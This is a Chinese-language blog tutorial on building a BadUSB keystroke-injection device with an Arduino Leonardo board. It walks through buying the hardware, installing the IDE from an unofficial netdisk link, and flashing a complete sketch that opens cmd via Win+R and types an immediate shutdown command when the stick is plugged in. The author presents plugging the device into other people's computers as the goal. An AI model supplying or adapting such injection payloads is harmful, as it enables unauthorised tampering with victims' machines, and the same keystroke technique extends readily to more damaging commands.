<!-- wp:quote -->

<p> 插入U盘自动攻击:BadUSB原理与实现 </p>
<!-- /wp:quote --> <!-- wp:more --> <!-- /wp:more --> <!-- wp:shortcode --> [player autoplay="1"] <!-- /wp:shortcode --> <!-- wp:paragraph --> <p>漏洞背景:</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>“BadUSB”是今年计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在今年的BlackHat安全大会上公布。BadUSB号称是世界上最邪恶的USB外设。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>U盘的内部构造:</p> <!-- /wp:paragraph --> <!-- wp:image {"id":317} --> <figure class="wp-block-image"></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>U盘由芯片控制器和闪存两部分组成,芯片控制器负责与PC的通讯和识别,闪存用来做数据存储;闪存中有一部分区域用来存放U盘的固件,它的作用类似于操作系统,控制软硬件交互;固件无法通过普通手段进行读取。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>BadUSB就是通过对U盘的固件进行逆向重新编程,相当于改写了U盘的操作系统而进行攻击的。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>我们不用刻意的去在意那么多的原理构造,那些都是硬件爱好者们喜欢的事,那么这种U盘我们要怎么得到呢,我们可以直接去某宝买个badusb然后我们对其进行编译开发</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>在某宝直接搜索badusb随便购买一个,大概三四十块钱。这里为避免广告嫌疑就不放链接了,买来之后就和普通的U盘一样,当我们买回来之后一定要注意,第一次U盘先不要在你的个人电脑上插,淘宝卖家可能会提前写入了一些数据,我们先去网吧插入然后用后文提到的软件重置一下再拿回来编译。</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>好了,硬件有了,我们现在要做的就是软件。我们去下载一个名叫aurdion的开发软件</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>https://wangpan.yuanpeng666.top/index.php/s/LATzXgG65crPRoo</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>下载完成之后我们开始安装软件,在安装过程中,会有如下提示,我们全部选择安装即可</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":320} --> <div class="wp-block-image"><figure class="aligncenter"></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>装完之后点击close,然后打开桌面上的软件图标,默认页面是这样的</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":321} --> <div class="wp-block-image"><figure class="aligncenter"></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>我们点击最上面的工具,选择端口,看到我们现在的badusb端口为COM4口,当然每个人的电脑都不一样,</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":322} --> <div class="wp-block-image"><figure class="aligncenter"></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>开发板选择Arduino Leonardo</p> <!-- /wp:paragraph --> <!-- wp:image {"id":323} --> <figure class="wp-block-image"></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>当所有的设置都调好了之后我们就开始在里面写我们的代码,</p> <!-- /wp:paragraph --> <!-- wp:paragraph --> <p>我这里先示范一个插入U盘后立马关机的代码</p> <!-- /wp:paragraph --> <!-- wp:code -->
#include <Keyboard.h>            
void setup() {
  // put your setup code here, to run once:
  Keyboard.begin();//开始键盘通讯
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK);//开启大写锁
  Keyboard.release(KEY_CAPS_LOCK);
  delay(50);
  Keyboard.press(KEY_LEFT_GUI);//win键
  delay(500);
  Keyboard.press('r');//r键
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);//按住win+R
  Keyboard.release('r');
  Keyboard.print("cmd");//输入cmd
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);//回车
  delay(500);
  Keyboard.print("shutdown -s -t 0");//关机
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);//回车
  Keyboard.end();
}

void loop() {
  // put your main code here, to run repeatedly:

}

<!-- /wp:code -->

<!-- wp:paragraph -->
<p>可以将上面的那些代码全都复制到你的软件中,然后点击图片下面的上传,等待软件将这些代码烧录进去,然后就OK啦,下面有一个上传成功的才算是完成了</p>
<!-- /wp:paragraph -->

<!-- wp:image {"align":"center","id":325} -->
<div class="wp-block-image"><figure class="aligncenter"></figure></div>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>之后我们将这个邪恶的U盘插在别人的电脑上就会实现自动关机。</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>好了现在来解释一下刚才的那些代码是什么意思,首先这些代码全都是C语言写出来的,第一句</p>
<!-- /wp:paragraph -->

<!-- wp:code -->

#include <Keyboard.h>    使用keyboard.h调用键盘
void setup() {           是一次执行
      }
void loop() {            循环执行你的代码,很少用到一般都是写在上面的
}

<!-- /wp:code -->

<!-- wp:paragraph -->
<p>上面使用的就是很简单的win+R然后输入“shutdown -s -t 0”意思是立马关机</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>同理你也可以在电脑上试着按一下,win+R 然后输入shutdown -s -t 0就会立马关机。这里将badusb的键盘库放出来供大家参考</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_LEFT_CTRL</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_LEFT_SHIFT</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_LEFT_ALT</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_LEFT_GUI    //win键</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_RIGHT_CTRL</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_RIGHT_SHIFT</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_RIGHT_ALT</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_RIGHT_GUI</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_UP_ARROW</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_DOWN_ARROW</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_LEFT_ARROW</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_RIGHT_ARROW</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_BACKSPACE</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_TAB</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_RETURN//回车键</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_ESC</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_INSERT</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_DELETE</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_PAGE_UP</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_PAGE_DOWN</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_HOME</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_END</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_CAPS_LOCK</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_F1</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_F2</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_F3</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_F4</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_F5</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_F6</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_F7</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_F8</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_F9</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_F10</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_F11</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>KEY_F12</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>

如果觉得本文帮到你的话别忘了点赞打赏哦

</p>
<!-- /wp:paragraph -->

最后修改:2020 年 02 月 28 日 06 : 51 PM
请俺喝杯咖啡呗